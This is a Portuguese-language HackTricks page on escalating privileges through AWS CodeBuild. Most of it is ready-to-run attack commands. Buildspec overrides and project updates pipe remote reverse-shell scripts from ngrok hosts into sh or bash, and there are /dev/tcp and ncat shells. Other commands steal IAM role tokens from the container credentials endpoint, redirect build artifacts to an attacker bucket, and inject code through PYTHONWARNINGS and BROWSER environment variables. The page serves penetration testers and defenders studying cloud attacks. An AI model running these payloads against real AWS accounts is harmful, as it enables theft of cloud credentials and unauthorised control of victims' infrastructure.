AWS - Codebuild Privesc

Tip

Aprenda e pratique AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Aprenda e pratique Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Apoie o HackTricks

codebuild

Mais informações em:

AWS - Codebuild Enum

codebuild:StartBuild | codebuild:StartBuildBatch

Basta uma dessas permissões para acionar um build com um novo buildspec e roubar o token da iam role atribuída ao projeto:

cat > /tmp/buildspec.yml <<EOF
version: 0.2

phases:
build:
commands:
- curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
EOF

aws codebuild start-build --project <project-name> --buildspec-override file:///tmp/buildspec.yml

Nota: A diferença entre esses dois comandos é que:

  • StartBuild aciona um único job de build usando um buildspec.yml específico.
  • StartBuildBatch permite iniciar um lote de builds, com configurações mais complexas (como rodar múltiplos builds em paralelo).

Impacto Potencial: privesc direto para as roles do AWS Codebuild anexadas.

StartBuild Override de Env Vars

Mesmo se você não puder modificar o projeto (UpdateProject) e não puder sobrescrever o buildspec, codebuild:StartBuild ainda permite sobrescrever env vars no momento do build via:

  • CLI: --environment-variables-override
  • API: environmentVariablesOverride

Se o build usa environment variables para controlar o comportamento (buckets de destino, feature flags, configurações de proxy, logs, etc.), isso pode ser suficiente para exfiltrar segredos que a role do build consegue acessar ou para obter execução de código dentro do build.

Exemplo 1: Redirecionar Artifact/Upload Destination para Exfiltrar Segredos

Se o build publica um artifact em um bucket/path controlado por uma env var (por exemplo UPLOAD_BUCKET), sobrescreva para um bucket controlado pelo atacante:

export PROJECT="<project-name>"
export EXFIL_BUCKET="<attacker-controlled-bucket>"

export BUILD_ID=$(aws codebuild start-build \
--project-name "$PROJECT" \
--environment-variables-override name=UPLOAD_BUCKET,value="$EXFIL_BUCKET",type=PLAINTEXT \
--query build.id --output text)

# Wait for completion
while true; do
STATUS=$(aws codebuild batch-get-builds --ids "$BUILD_ID" --query 'builds[0].buildStatus' --output text)
[ "$STATUS" = "SUCCEEDED" ] && break
[ "$STATUS" = "FAILED" ] || [ "$STATUS" = "FAULT" ] || [ "$STATUS" = "STOPPED" ] || [ "$STATUS" = "TIMED_OUT" ] && exit 1
sleep 5
done

# Example expected location (depends on the buildspec/project logic):
aws s3 cp "s3://$EXFIL_BUCKET/uploads/$BUILD_ID/flag.txt" -
Exemplo 2: Python Startup Injection via PYTHONWARNINGS + BROWSER

Se o build executar python3 (comum em buildspecs), às vezes você pode obter execução de código sem tocar no buildspec abusando de:

  • PYTHONWARNINGS: Python resolve o category field e importará caminhos com pontos. Defini-lo como ...:antigravity.x:... força a importação do módulo stdlib antigravity.
  • antigravity: chama webbrowser.open(...).
  • BROWSER: controla o que webbrowser executa. No Linux é separado por :. Usar #%s faz com que o argumento de URL seja um comentário do shell.

Isso pode ser usado para imprimir as credenciais da role do CodeBuild (de http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI) nos logs do CloudWatch, e então recuperá-las se você tiver permissões de leitura dos logs.

Expansível: requisição StartBuild JSON para o truque PYTHONWARNINGS + BROWSER ```json { "projectName": "codebuild_lab_7_project", "environmentVariablesOverride": [ { "name": "PYTHONWARNINGS", "value": "all:0:antigravity.x:0:0", "type": "PLAINTEXT" }, { "name": "BROWSER", "value": "/bin/sh -c 'echo CREDS_START; URL=$(printf \"http\\\\072//169.254.170.2%s\" \"$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI\"); curl -s \"$URL\"; echo CREDS_END' #%s", "type": "PLAINTEXT" } ] } ```

iam:PassRole, codebuild:CreateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Um atacante com as iam:PassRole, codebuild:CreateProject, e codebuild:StartBuild ou codebuild:StartBuildBatch permissões seria capaz de escalar privilégios para qualquer codebuild IAM role criando um em execução.

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

JSON="{
\"name\": \"codebuild-demo-project\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"


REV_PATH="/tmp/rev.json"

printf "$JSON" > $REV_PATH

# Create project
aws codebuild create-project --name codebuild-demo-project --cli-input-json file://$REV_PATH

# Build it
aws codebuild start-build --project-name codebuild-demo-project

# Wait 3-4 mins until it's executed
# Then you can access the logs in the console to find the AWS role token in the output

# Delete the project
aws codebuild delete-project --name codebuild-demo-project

Impacto Potencial: Direct privesc to any AWS Codebuild role.

Warning

Em um Codebuild container o ficheiro /codebuild/output/tmp/env.sh contém todas as variáveis de ambiente necessárias para aceder às credenciais de metadados.

Este ficheiro contém a variável de ambiente AWS_CONTAINER_CREDENTIALS_RELATIVE_URI que contém o caminho URL para aceder às credenciais. Será algo como /v2/credentials/2817702c-efcf-4485-9730-8e54303ec420

Adicione isso ao URL http://169.254.170.2/ e você poderá dump as credenciais da role.

Além disso, também contém a variável de ambiente ECS_CONTAINER_METADATA_URI que contém o URL completo para obter informações de metadados sobre o container.

iam:PassRole, codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Assim como na seção anterior, se em vez de criar um projeto de build você puder modificá-lo, pode indicar o IAM Role e roubar o token

REV_PATH="/tmp/codebuild_pwn.json"

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

# You need to indicate the name of the project you want to modify
JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"

printf "$JSON" > $REV_PATH

aws codebuild update-project --name codebuild-demo-project --cli-input-json file://$REV_PATH

aws codebuild start-build --project-name codebuild-demo-project

Impacto Potencial: Privesc direto para qualquer role do AWS Codebuild.

codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Como na seção anterior, mas sem a permissão iam:PassRole, você pode abusar dessas permissões para modificar projetos Codebuild existentes e acessar a role que eles já têm atribuída.

REV_PATH="/tmp/codebuild_pwn.json"

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"

JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
\"computeType\": \"BUILD_GENERAL1_SMALL\",
\"imagePullCredentialsType\": \"CODEBUILD\"
}
}"

# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!

printf "$JSON" > $REV_PATH

aws codebuild update-project --cli-input-json file://$REV_PATH

aws codebuild start-build --project-name codebuild-demo-project

Impacto Potencial: Privesc direto para as roles anexadas do AWS Codebuild.

SSM

Tendo permissões suficientes para iniciar uma sessão ssm é possível entrar dentro de um projeto Codebuild enquanto está sendo construído.

The codebuild project will need to have a breakpoint:

phases:
pre_build:
commands:
- echo Entered the pre_build phase...
- echo "Hello World" > /tmp/hello-world
      - codebuild-breakpoint

E então:

aws codebuild batch-get-builds --ids <buildID> --region <region> --output json
aws ssm start-session --target <sessionTarget> --region <region>

For more info check the docs.

(codebuild:StartBuild | codebuild:StartBuildBatch), s3:GetObject, s3:PutObject

Um attacker capaz de iniciar/reiniciar um build de um projeto específico do CodeBuild que armazena seu arquivo buildspec.yml em um bucket S3 ao qual o attacker tem write access, pode obter command execution no processo do CodeBuild.

Note: a escalation é relevante apenas se o CodeBuild worker tiver um role diferente — preferencialmente mais privileged — do que o role do attacker.

aws s3 cp s3://<build-configuration-files-bucket>/buildspec.yml ./

vim ./buildspec.yml

# Add the following lines in the "phases > pre_builds > commands" section
#
#    - apt-get install nmap -y
#    - ncat <IP> <PORT> -e /bin/sh

aws s3 cp ./buildspec.yml s3://<build-configuration-files-bucket>/buildspec.yml

aws codebuild start-build --project-name <project-name>

# Wait for the reverse shell :)

Você pode usar algo como este buildspec para obter um reverse shell:

version: 0.2

phases:
build:
commands:
- bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1

Impacto: privesc direto para a role usada pelo AWS CodeBuild worker que geralmente tem privilégios elevados.

Warning

Observe que o buildspec pode estar em formato zip, então um atacante precisaria fazer download, unzip, modificar o buildspec.yml do diretório raiz, zip novamente e fazer upload

Mais detalhes podem ser encontrados aqui.

Impacto Potencial: privesc direto para as AWS Codebuild roles associadas.

Tip

Aprenda e pratique AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Aprenda e pratique Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Apoie o HackTricks